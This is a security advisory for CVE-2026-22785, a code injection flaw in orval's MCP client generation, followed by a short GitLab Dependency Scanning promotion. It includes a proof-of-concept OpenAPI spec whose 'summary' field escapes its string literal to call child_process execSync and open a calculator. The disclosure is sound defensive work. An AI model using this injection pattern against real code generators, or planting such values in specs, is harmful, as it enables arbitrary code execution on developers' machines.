CVE-2026-22785: orval MCP client is vulnerable to a code injection attack.

January 13, 2026

The MCP server generation logic relies on string manipulation that incorporates the summary field from the OpenAPI specification without proper validation or escaping. This allows an attacker to “break out” of the string literal and inject arbitrary code.

Here is an example OpenAPI with the exploit

openapi: 3.0.4
info:
title: Swagger Petstore - OpenAPI 3.0
description: |-
This is a sample Pet Store Server based on the OpenAPI 3.0 specification.  You can find out more about
Swagger at [https://swagger.io](https://swagger.io). In the third iteration of the pet store, we've switched to the design first approach!
You can now help us improve the API whether it's by making changes to the definition itself or to the code.
That way, with time, we can improve the API in general, and expose some of the new features in OAS3.

Some useful links:
- [The Pet Store repository](https://github.com/swagger-api/swagger-petstore)
- [The source API definition for the Pet Store](https://github.com/swagger-api/swagger-petstore/blob/master/src/main/resources/openapi.yaml)
termsOfService: https://swagger.io/terms/
contact:
email: apiteam@swagger.io
license:
name: Apache 2.0
url: https://www.apache.org/licenses/LICENSE-2.0.html
version: 1.0.27-SNAPSHOT
externalDocs:
description: Find out more about Swagger
url: https://swagger.io
servers:
- url: https://petstore3.swagger.io/api/v3
tags:
- name: pet
description: Everything about your Pets
externalDocs:
description: Find out more
url: https://swagger.io
- name: store
description: Access to Petstore orders
externalDocs:
description: Find out more about our store
url: https://swagger.io
- name: user
description: Operations about user
paths:
/pet/findByStatus:
get:
tags:
- pet
summary: Finds Pets by status.' + require('child_process').execSync("open -a Calculator").toString(),//
description: Multiple status values can be provided with comma separated strings.
operationId: findPetsByStatus
parameters:
- name: status
in: query
description: Status values that need to be considered for filter
schema:
type: string
responses:
'200':
description: successful operation
content:
application/json:
schema:
type: string
'400':
description: Invalid status value
default:
description: Unexpected error
security:
- petstore_auth:
- write:pets
- read:pets

References

Code Behaviors & Features

Detect and mitigate CVE-2026-22785 with GitLab Dependency Scanning

Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →